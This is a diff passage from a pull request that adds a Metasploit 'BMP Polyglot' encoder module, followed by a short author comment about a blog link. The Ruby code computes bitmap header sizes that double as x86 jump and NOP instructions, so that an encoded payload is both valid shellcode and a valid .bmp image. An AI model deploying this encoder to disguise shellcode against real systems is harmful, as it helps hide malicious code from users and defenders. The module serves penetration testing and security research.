modules/encoders/x86/bmp_polyglot.rb

```diff
@@ -0,0 +1,423 @@
+
+      if b0 > 0xe9
+        if b0 > 0xfd
+          size = increment_size(size, i)
+        end
+        size[i] = round_up_to_nop(b0)
+      else
+        size[i] = 0xe9
+        b1 = min_jmp if b1 < min_jmp
+        size[i + 1] = b1
+        return size.pack('CCCC').unpack('V')[0]
+      end
+    end
+  end
+
+  def new_size_short
+    return if @minimum_jump > 0x81  # short won't make it in this case (0x7f + 0.upto(2).to_a.max)
+    size = [ @original_size ].pack('V').unpack('CCCC')
+
+    0.upto(2) do |i|
+      b0 = size[i]
+      b1 = size[i + 1]
+      min_jmp = (@minimum_jump - 2 - i)
+
+      if b0 > 0xeb
+        if b0 > 0xfd
+          size = increment_size(size, i)
+        end
+        size[i] = round_up_to_nop(b0)
+      else
+        size[i] = 0xeb
+        if b1 > 0x7f
+          b1 = min_jmp
+          size = increment_size(size, i + 1)
+        elsif b1 < min_jmp
+          b1 = min_jmp
+        end
+        size[i + 1] = b1
+        return size.pack('CCCC').unpack('V')[0]
+      end
+    end
+  end
+
+  def size_to_jmp(size)
+    jmp = 0
+    packed = [ size, 0 ].pack('VV')
+
+    until [ "\xe9", "\xeb" ].include?(packed[0])
+      packed = packed[1..-1]
+      jmp += 1
+    end
+
+    if packed[0] == "\xe9"
+      jmp +=  packed[1..4].unpack('V')[0]
+      jmp += 5
+    elsif packed[0] == "\xeb"
+      jmp += packed[1].unpack('C')[0]
+      jmp += 2
+    end
+
+    jmp
+  end
+
+  private
+
+  def increment_size(size, byte)
+    size = size.pack('CCCC').unpack('V')[0]
+    size += (0x0100 << byte * 8)
+    [ size ].pack('V').unpack('CCCC')
+  end
+
+  def round_up_to_nop(opcode)
+    byte_nops = [
+      0x42, # inc edx
+      0x45, # inc ebp
+      0x4a, # dec edx
+      0x4d, # dec ebp
+      0x90, # xchg eax, eax / nop
+      0xf5, # cmc
+      0xf8, # clc
+      0xf9, # stc
+      0xfc, # cld
+      0xfd  # std
+    ]
+    byte_nops.each do |nop|
+      return nop if opcode <= nop
+    end
+  end
+
+end
+
+class Metasploit4 < Msf::Encoder
+
+  Rank = ManualRanking
+
+  DESTEGO_STUB_SIZE = 53
+  # bitmap header sizes
+  BM_HEADER_SIZE = 14
+  DIB_HEADER_SIZE = 40
+
+  def initialize
+    super(
+      'Name'             => 'BMP Polyglot',
+      'Description'      => %q{
+        Encodes a payload in such a way that the resulting binary blob is both
+        valid x86 shellcode and a valid bitmap image file (.bmp). The selected
+        bitmap file to inject into must use the BM (Windows 3.1x/95/NT) header
+        and the 40-byte Windows 3.1x/NT BITMAPINFOHEADER. Additionally the file
+        must use either 24 or 32 bits per pixel as the color depth and no
+        compression. This encoder makes absolutely no effort to remove any
+        invalid characters.
+      },
+      'Author'           => 'Spencer McIntyre',
+      'Arch'             => ARCH_X86,
+      'License'          => MSF_LICENSE,
+      'References'       =>
+        [
+          [ 'URL'        => 'https://warroom.securestate.com/bmp-x86-polyglot/' ]
```

Comment:
I submitted this PR preemptively before the blog was published but it's live now so the link is no longer a `404`.